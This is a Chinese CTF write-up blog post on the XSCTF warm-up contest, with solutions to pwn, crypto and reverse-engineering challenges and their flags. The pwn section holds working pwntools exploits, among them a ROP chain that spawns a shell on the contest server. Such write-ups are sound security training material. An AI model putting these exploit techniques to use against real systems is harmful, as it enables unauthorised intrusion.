<p>flag{b3cause_ba6y_u_arrre_so_beautiffffuuulll!!}</p>
<h2 id="easy_sql">easy_sql</h2>
<blockquote>
<p>嘉然，为了你我要打ctf！！！咦？这里这么注入不进去呢？奇怪</p>
</blockquote>
<p>sql注入，是个登录框</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211402159.png?x-oss-process=hzy" alt="image-20221021140229833"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211410965.png?x-oss-process=hzy" alt="image-20221021141049892"></p>
<p>访问robots.txt发现一个备份文件，但是文件名不全</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211411208.png?x-oss-process=hzy" alt="image-20221021141130145"></p>
<p>未出，没思路了，备份文件都下不来，脑洞了</p>
<h1 id="pwn">PWN</h1>
<h2 id="babystack">babystack</h2>
<blockquote>
<p>非常简单的栈溢出<br>
nc 43.248.98.206 10041</p>
</blockquote>
<p>信了就是简单的栈溢出</p>
<p>不过多说了，直接exp</p>
<pre><code class="hljs plaintext">from pwn import *
p = remote(&#x27;43.248.98.206&#x27;,10041)
#p = process(&quot;./babystack&quot;)
context.log_level = &#x27;debug&#x27;
payload = b&#x27;a&#x27;*20+p64(0x401195)
p.sendline(payload)
p.interactive()</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181816411.png?x-oss-process=hzy" alt="image-20221018181605349"></p>
<p>hsctf{BAdvV0mQn_QuE3nkun}</p>
<h2 id="easyrop">easyrop</h2>
<p>rop</p>
<pre><code class="hljs plaintext">from pwn import *
#from LibcSearcher import *
context(log_level=&#x27;debug&#x27;,os=&#x27;linux&#x27;,arch=&#x27;amd64&#x27;)
r = remote(&quot;43.248.98.206&quot;,10046)
#r = process(&#x27;./rop&#x27;)
elf = ELF(&#x27;./rop&#x27;)


main=4007E3
scanf_plt = elf.plt[&#x27;__isoc99_scanf&#x27;]
PUTS_GOT = elf.got[&#x27;puts&#x27;]
RET = 0x004007D1
PUTS_PLT = elf.plt[&#x27;puts&#x27;]
MAIN_PLT = 0x4005F0
POP_RDI = 0x400873
pop_rsi_r15_ret = 0x0000000000400871
payload =  b&#x27;a&#x27;*(0x70+8)+ p64(POP_RDI) +p64(0x004008E9) + p64(pop_rsi_r15_ret) +p64(0x00601060+0x200)+p64(0)+p64(scanf_plt)+p64(RET)+p64(0x000000000400787)


r.sendline(payload)
r.sendline(b&#x27;/bin/sh;&#x27;)

payload =  b&#x27;a&#x27;*(0x70+8)+ p64(POP_RDI) +p64(0x00601060+0x200) +p64(RET)+ p64(elf.plt[&#x27;system&#x27;])

r.sendline(payload)
r.interactive()
</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211335516.png?x-oss-process=hzy" alt="image-20221021133516416"></p>
<p>flag{6XqbzirmJmaSZdUP1egiCeoQ}</p>
<h2 id="送flag">送flag</h2>
<p>也是栈溢出，只不过保护机制多开了一个ELF随机地址</p>
<p>脚本如下</p>
<pre><code class="hljs plaintext">from pwn import *
context.log_level = &#x27;debug&#x27;
#p=process(&#x27;./song&#x27;)
p=remote(&#x27;43.248.98.206&#x27;,10050)
p.recvuntil(b&quot;:&quot;)
m=p.recv(14)
c=str(m, encoding=&quot;utf-8&quot;)
sys=int(c,16)-0x14
payload=b&#x27;a&#x27;*(0x40+8)+p64(sys)
p.sendline(payload)
p.interactive()</code></pre>
<p>hsctf{Z2l2ZXlvdWFmbGFn}</p>
<h1 id="crypto">CRYPTO</h1>
<h2 id="baigeirsa">baigeiRSA</h2>
<blockquote>
<p>白给了，白给了，真白给！</p>
</blockquote>
<p>题目如下</p>
<pre><code class="hljs plaintext">import libnum
from Crypto.Util import number
from secret import flag

size = 128
e = 65537
p = number.getPrime(size)
q = number.getPrime(size)
n = p*q

m = libnum.s2n(flag)
c = pow(m, e, n)

print(&#x27;n = %d&#x27; % n)
print(&#x27;c = %d&#x27; % c)
</code></pre>
<pre><code class="hljs plaintext">n = 88503001447845031603457048661635807319447136634748350130947825183012205093541
c = 40876621398366534035989065383910105526025410999058860023908252093679681817257
</code></pre>
<p>知道n，c，e，n不大直接yafu分解</p>
<p>得到</p>
<pre><code class="hljs plaintext">p=274539690398523616505159415195049044439
q=322368694010594584041053487661458382819</code></pre>
<p>剩下的就是一把梭了</p>
<pre><code class="hljs plaintext">#!/usr/bin/env python3
# coding:utf-8
#power by jedi

import gmpy2
import binascii


p = gmpy2.mpz(274539690398523616505159415195049044439)
q = gmpy2.mpz(322368694010594584041053487661458382819)
e = gmpy2.mpz(65537)
n=p*q
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
c = gmpy2.mpz(40876621398366534035989065383910105526025410999058860023908252093679681817257)

m = pow(c, d, n)
print(&quot;十进制:\n%s&quot;%m)
m_hex = hex(m)[2:]
print(&quot;十六进制:\n%s&quot;%(m_hex,))
#print(&quot;ascII:\n%s&quot;%((binascii.b2a_hex(hex(m)[2:])).decode(&#x27;hex&#x27;),))
print(&quot;ascii:\n%s&quot;%(binascii.a2b_hex(m_hex).decode(&quot;utf8&quot;),))
</code></pre>
<p>HSCTF{@Zh3n_Ba1_G3i!@}</p>
<h2 id="baigeirsa2">baigeiRSA2</h2>
<blockquote>
<p>既然白给，就多给一点吧！</p>
</blockquote>
<p>题目如下</p>
<pre><code class="hljs plaintext">import libnum
from Crypto.Util import number
from functools import reduce
from secret import flag

n = 5
size = 64
while True:
    ps = [number.getPrime(size) for _ in range(n)]
    if len(set(ps)) == n:
        break

e = 65537
n = reduce(lambda x, y: x*y, ps)
m = libnum.s2n(flag)
c = pow(m, e, n)

print(&#x27;n = %d&#x27; % n)
print(&#x27;c = %d&#x27; % c)
</code></pre>
<pre><code class="hljs plaintext">n = 175797137276517400024170861198192089021253920489351812147043687817076482376379806063372376015921
c = 144009221781172353636339988896910912047726260759108847257566019412382083853598735817869933202168
</code></pre>
<p>64位RSA算法，靠yafu分解出来五个值，没遇到过这种情况，暂且放这</p>
<pre><code class="hljs plaintext">P19 = 9401433281508038261
P20 = 10252499084912054759
P20 = 11855687732085186571
P20 = 11215197893925590897
P20 = 13716847112310466417</code></pre>
<p>exp</p>
<pre><code class="hljs plaintext">from Crypto.Util.number import *
from gmpy2 import *
n = 175797137276517400024170861198192089021253920489351812147043687817076482376379806063372376015921
c = 144009221781172353636339988896910912047726260759108847257566019412382083853598735817869933202168
e=65537
p=9401433281508038261
q=10252499084912054759
r3=11215197893925590897
r4=11855687732085186571
r5=13716847112310466417
d=invert(e,(p-1)*(q-1)*(r3-1)*(r4-1)*(r5-1))
m=pow(c,d,n)
print(long_to_bytes(m))
</code></pre>
<p>HSCTF{@Tv0_br3ad5_c1ip_cHe3se_!@}</p>
<h2 id="二元一次方程组">二元一次方程组</h2>
<p>题目如下</p>
<pre><code class="hljs plaintext">n = 5700102857084805454304483466349768960970728516788155745115335016563400814300152521175777999545445613444815936222559357974566843756936687078467221979584601
avg = 75635892913589759545076958131039534718834447688923830032758709253942408722875
c = 888629627089650993173073530112503758717074884215641346688043288414489462472394318700014742820213053802180975816089493243275025049174955385229062207064503</code></pre>
<pre><code class="hljs plaintext">import libnum
from Crypto.Util import number
from secret import flag


size = 256
e = 65537
p = number.getPrime(size)
q = number.getPrime(size)
avg = (p+q)/2
n = p*q

m = libnum.s2n(flag)
c = pow(m, e, n)

print(&#x27;n = %d&#x27; % n)
print(&#x27;avg = %d&#x27; % avg)
print(&#x27;c = %d&#x27; % c)
</code></pre>
<p>二元一次方程可以解出来p和q</p>
<pre><code class="hljs plaintext"># n =p*q
# avg = (p+q)/2
# n = 5700102857084805454304483466349768960970728516788155745115335016563400814300152521175777999545445613444815936222559357974566843756936687078467221979584601
# avg = 75635892913589759545076958131039534718834447688923830032758709253942408722875</code></pre>
<p>破脚本总之是出来得数了，大佬不喜勿喷</p>
<pre><code class="hljs plaintext">from sympy import *

#定义变量
p = Symbol(&#x27;p&#x27;)
q = Symbol(&#x27;q&#x27;)
print(solve([p*q-5700102857084805454304483466349768960970728516788155745115335016563400814300152521175777999545445613444815936222559357974566843756936687078467221979584601,(p+q)/2-75635892913589759545076958131039534718834447688923830032758709253942408722875],[p,q]))
#[(71087768052593510372666084538192216997254291933607002714885530754163087727843, 80184017774586008717487831723886852440414603444240657350631887753721729717907), (80184017774586008717487831723886852440414603444240657350631887753721729717907, 71087768052593510372666084538192216997254291933607002714885530754163087727843)]</code></pre>
<pre><code class="hljs plaintext">p=71087768052593510372666084538192216997254291933607002714885530754163087727843
q=80184017774586008717487831723886852440414603444240657350631887753721729717907
c = 888629627089650993173073530112503758717074884215641346688043288414489462472394318700014742820213053802180975816089493243275025049174955385229062207064503
n = 5700102857084805454304483466349768960970728516788155745115335016563400814300152521175777999545445613444815936222559357974566843756936687078467221979584601
e = 65537</code></pre>
<p>然后再用上边第一个rsa的脚本就可以了</p>
<p>hsctf{Dl3F4TH3rRR4iin_AvAvA}</p>
<h1 id="re">RE</h1>
<h2 id="211">2^11</h2>
<blockquote>
<p>在sage里又是什么意思呢……？</p>
</blockquote>
<p>主要逻辑如下</p>
<pre><code class="hljs plaintext">int __cdecl main(int argc, const char **argv, const char **envp)
&#123;
  int v3; // edx
  int v4; // ecx
  int v5; // eax
  int v7; // eax
  int v8; // eax
  int v9; // edx
  WORD v10; // bx
  HANDLE v11; // eax
  int v12; // eax

  __main();
  p = (unsigned int)malloc(1u);
  while ( i-- )
  &#123;
    v3 = -6 * i + 35;
    m[v3] = -1;
    v4 = 6 * i;
    m[v4] = m[v3];
    v5 = 35 - i;
    m[v5] = m[v4];
    m[i] = m[v5];
  &#125;
  srand(p);
  __mingw_free(p);
  while ( (air || can) &amp;&amp; c != 27 )
  &#123;
    if ( c == 65 || c == 87 )
    &#123;
      j = 30;
      i = 1;
      if ( c == 65 )
        v7 = -1;
      else
        v7 = -6;
      order(6, v7);
    &#125;
    if ( c == 68 || c == 83 )
    &#123;
      j = 6;
      i = -1;
      if ( c == 68 )
        v8 = 1;
      else
        v8 = 6;
      order(30, v8);
    &#125;
    if ( c == 81 )
      exit(0);
    if ( air )
    &#123;
      if ( !can )
      &#123;
        --air;
        if ( !system(&quot;cls&quot;) )
        &#123;
          do
            i = rand() % 30;
          while ( m[i] );
          if ( rand() % 5 )
            v9 = 1;
          else
            v9 = 2;
          m[i] = v9;
          p = (unsigned int)&amp;unk_408098;
          while ( 1 )
          &#123;
            p -= 4;
            if ( p - (_DWORD)m == 24 )
              break;
            if ( *(int *)p &lt; -1 )
              *(_DWORD *)p = -*(_DWORD *)p;
          &#125;
          while ( 1 )
          &#123;
            p += 4;
            if ( p - (_DWORD)m == 124 )
              break;
            v10 = bg[*(_DWORD *)p % 12 + 1];
            v11 = GetStdHandle(0xFFFFFFF5);
            SetConsoleTextAttribute(v11, v10);
            if ( *(_DWORD *)p != -1 &amp;&amp; (*(_DWORD *)p == *(_DWORD *)(p + 4) || *(_DWORD *)p == *(_DWORD *)(p + 24)) )
              ++can;
            if ( !(((int)(p - (_DWORD)m) &gt;&gt; 2) % 6) )
              _cputs(&quot;\n&quot;);
            if ( *(_DWORD *)p != -1 )
            &#123;
              if ( *(_DWORD *)p )
                v12 = 1 &lt;&lt; *(_DWORD *)p;
              else
                v12 = 0;
              _cprintf(&quot;%5d&quot;, v12);
            &#125;
          &#125;
          if ( !air &amp;&amp; !can )
          &#123;
            _cputs(&quot;Game over!&quot;);
            system(&quot;pause&quot;);
          &#125;
          _cprintf(&quot;W - up\nA - left\nS - down\nD - right\nQ - quit\n&quot;);
          _cprintf(&quot;score:%d\n&quot;, score);
          if ( score &gt; 2020 )
            secret();
        &#125;
      &#125;
    &#125;
    LOBYTE(c) = _getch() &amp; 0x5F;
    c = (unsigned __int8)c;
  &#125;
  return 0;
&#125;</code></pre>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212128126.png?x-oss-process=hzy" alt="image-20221021212853054"></p>
<p>成绩达到2020就算成功，跟进secret函数</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212129334.png?x-oss-process=hzy" alt="image-20221021212928267"></p>
<p>脚本如下</p>
<pre><code class="hljs plaintext">a = &#x27;H4ve_fun_w1th_R3verse_my_friend~&#x27;
b = &#x27;.X\x17\x02$#D\nl\x04e6\x1A\x10&amp;[E\x17-0\x04\r]03\x0F\x19\x06\x10\x02\x01\x03&#x27;
flag = &#x27;&#x27;
for i in range(32):
    flag += chr(ord(a[i]) ^ ord(b[i]))
print(flag)
</code></pre>
<p>flag{E1d3sTBrOth3r_CaR0Ilikoule}</p>
<h2 id="baigeixor">baigeiXOR</h2>
<blockquote>
<p>Tover嫌弃我出的题目太难了，于是抢了我的键盘出了这道白给题</p>
</blockquote>
<p>flag{b4igei_baig3il3_zhenba1ge1}</p>

    </div>

    
    
    
        <div class="reward-container">
  <div>制作不易，如若感觉写的不错，欢迎打赏</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechat.jpg" alt="故里 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/zhifubao.jpg" alt="故里 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>故里
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://hzy2003628.top/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/" title="XSCTF联合招新赛（热身赛）">https://hzy2003628.top/2022/10/21/XSCTF 联合招新赛(热身赛）/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" rel="tag"><i class="fa fa-tag"></i> 赛后复盘</a>
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          </div>

        



        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/10/02/SWPU%20NSS%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="prev" title="SWPU--NSS新生賽">
      <i class="fa fa-chevron-left"></i> SWPU--NSS新生賽
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/10/27/Moectf%E8%A5%BF%E7%94%B5CTF%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="next" title="2022Moectf">
      2022Moectf <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>




        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#xsctf-%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B%E7%83%AD%E8%BA%AB%E8%B5%9B"><span class="nav-number">1.</span> <span class="nav-text">XSCTF 联合招新赛（热身赛）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">2.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#misc"><span class="nav-number">3.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#b45364"><span class="nav-number">3.1.</span> <span class="nav-text">B45364</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#phone_call"><span class="nav-number">3.2.</span> <span class="nav-text">phone_call</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%B8%A0-%E6%89%93-%E7%94%B5-%E8%AF%9D"><span class="nav-number">3.3.</span> <span class="nav-text">鸠 打 电 话</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%98%B3%E9%97%B4%E9%A2%98"><span class="nav-number">3.4.</span> <span class="nav-text">阳间题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E4%B8%AA%E5%B0%8F%E5%BD%A9%E8%9B%8B"><span class="nav-number">3.5.</span> <span class="nav-text">一个小彩蛋！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#image1"><span class="nav-number">3.6.</span> <span class="nav-text">image1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#image2"><span class="nav-number">3.7.</span> <span class="nav-text">image2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#image3"><span class="nav-number">3.8.</span> <span class="nav-text">image3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#image4"><span class="nav-number">3.9.</span> <span class="nav-text">image4</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web"><span class="nav-number">4.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%B4%E5%A4%B4%E6%98%AF%E9%81%93"><span class="nav-number">4.1.</span> <span class="nav-text">头头是道</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#warm_up"><span class="nav-number">4.2.</span> <span class="nav-text">warm_up</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezser"><span class="nav-number">4.3.</span> <span class="nav-text">ezser</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezphp"><span class="nav-number">4.4.</span> <span class="nav-text">EZphp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#updater"><span class="nav-number">4.5.</span> <span class="nav-text">updater</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#babyxss"><span class="nav-number">4.6.</span> <span class="nav-text">babyxss</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easy_sql"><span class="nav-number">4.7.</span> <span class="nav-text">easy_sql</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn"><span class="nav-number">5.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#babystack"><span class="nav-number">5.1.</span> <span class="nav-text">babystack</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easyrop"><span class="nav-number">5.2.</span> <span class="nav-text">easyrop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%81flag"><span class="nav-number">5.3.</span> <span class="nav-text">送flag</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#crypto"><span class="nav-number">6.</span> <span class="nav-text">CRYPTO</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#baigeirsa"><span class="nav-number">6.1.</span> <span class="nav-text">baigeiRSA</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#baigeirsa2"><span class="nav-number">6.2.</span> <span class="nav-text">baigeiRSA2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E5%85%83%E4%B8%80%E6%AC%A1%E6%96%B9%E7%A8%8B%E7%BB%84"><span class="nav-number">6.3.</span> <span class="nav-text">二元一次方程组</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#re"><span class="nav-number">7.</span> <span class="nav-text">RE</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#211"><span class="nav-number">7.1.</span> <span class="nav-text">2^11</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#baigeixor"><span class="nav-number">7.2.</span> <span class="nav-text">baigeiXOR</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="故里"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">故里</p>
  <div class="site-description" itemprop="description">没有所谓失败，除非你不再尝试</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">100</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:2596328958@qq.com" title="E-Mail → mailto:2596328958@qq.com" rel="noopener" target="_blank"><i class="envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>
	  

	     <!-- canvas粒子时钟 -->
        
        <div id="">
  <canvas id="canvas" style="width:60%;">
</div>
<script async>
(function(){
  var WINDOW_WIDTH = 820;
  		var WINDOW_HEIGHT = 250;
  		var RADIUS = 7; //球半径
  		var NUMBER_GAP = 10; //数字之间的间隙
  		var u=0.65; //碰撞能量损耗系数
  		var context; //Canvas绘制上下文
  		var balls = []; //存储彩色的小球
  		const colors = ["#33B5E5","#0099CC","#AA66CC","#9933CC","#99CC00","#669900","#FFBB33","#FF8800","#FF4444","#CC0000"]; //彩色小球的颜色
  		var currentNums = []; //屏幕显示的8个字符
  		var digit =
                  [
                      [
                          [0,0,1,1,1,0,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,0,1,1,0],
                          [0,0,1,1,1,0,0]
                      ],//0
                      [
                          [0,0,0,1,1,0,0],
                          [0,1,1,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [1,1,1,1,1,1,1]
                      ],//1
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,1,1],
                          [1,1,1,1,1,1,1]
                      ],//2
                      [
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,1,0,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//3
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,0],
                          [0,0,1,1,1,1,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,1,1,0],
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,1]
                      ],//4
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,1,1,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//5
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//6
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0]
                      ],//7
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//8
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,1,1,0,0,0,0]
                      ],//9
                      [
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0]
                      ]//:
                  ];

  		function drawDatetime(cxt){
  			var nums = [];

  			context.fillStyle="#005eac"
  			var date = new Date();
  			var offsetX = 70, offsetY = 30;
  			var hours = date.getHours();
  			var num1 = Math.floor(hours/10);
  			var num2 = hours%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var minutes = date.getMinutes();
  			var num1 = Math.floor(minutes/10);
  			var num2 = minutes%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var seconds = date.getSeconds();
  			var num1 = Math.floor(seconds/10);
  			var num2 = seconds%10;
  			nums.push({num: num1});
  			nums.push({num: num2});

  			for(var x = 0;x<nums.length;x++){
  				nums[x].offsetX = offsetX;
  				offsetX = drawSingleNumber(offsetX,offsetY, nums[x].num,cxt);
  				//两个数字连一块，应该间隔一些距离
  				if(x<nums.length-1){
  					if((nums[x].num!=10) &&(nums[x+1].num!=10)){
  						offsetX+=NUMBER_GAP;
  					}
  				}
  			}

  			//说明这是初始化
  			if(currentNums.length ==0){
  				currentNums = nums;
  			}else{
  				//进行比较
  				for(var index = 0;index<currentNums.length;index++){
  					if(currentNums[index].num!=nums[index].num){
  						//不一样时，添加彩色小球
  						addBalls(nums[index]);
  						currentNums[index].num=nums[index].num;
  					}
  				}
  			}
  			renderBalls(cxt);
  			updateBalls();

  			return date;
  		}

  		function addBalls (item) {
  			var num = item.num;
  			var numMatrix = digit[num];
  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						var ball={
  							offsetX:item.offsetX+RADIUS+RADIUS*2*x,
  							offsetY:30+RADIUS+RADIUS*2*y,
  							color:colors[Math.floor(Math.random()*colors.length)],
  							g:1.5+Math.random(),
  							vx:Math.pow(-1, Math.ceil(Math.random()*10))*4+Math.random(),
  							vy:-5
  						}
  						balls.push(ball);
  					}
  				}
  			}
  		}

  		function renderBalls(cxt){
  			for(var index = 0;index<balls.length;index++){
  				cxt.beginPath();
  				cxt.fillStyle=balls[index].color;
  				cxt.arc(balls[index].offsetX, balls[index].offsetY, RADIUS, 0, 2*Math.PI);
  				cxt.fill();
  			}
  		}

  		function updateBalls () {
  			var i =0;
  			for(var index = 0;index<balls.length;index++){
  				var ball = balls[index];
  				ball.offsetX += ball.vx;
  				ball.offsetY += ball.vy;
  				ball.vy+=ball.g;
  				if(ball.offsetY > (WINDOW_HEIGHT-RADIUS)){
  					ball.offsetY= WINDOW_HEIGHT-RADIUS;
  					ball.vy=-ball.vy*u;
  				}
  				if(ball.offsetX>RADIUS&&ball.offsetX<(WINDOW_WIDTH-RADIUS)){

  					balls[i]=balls[index];
  					i++;
  				}
  			}
  			//去除出边界的球
  			for(;i<balls.length;i++){
  				balls.pop();
  			}
  		}
  		function drawSingleNumber(offsetX, offsetY, num, cxt){
  			var numMatrix = digit[num];
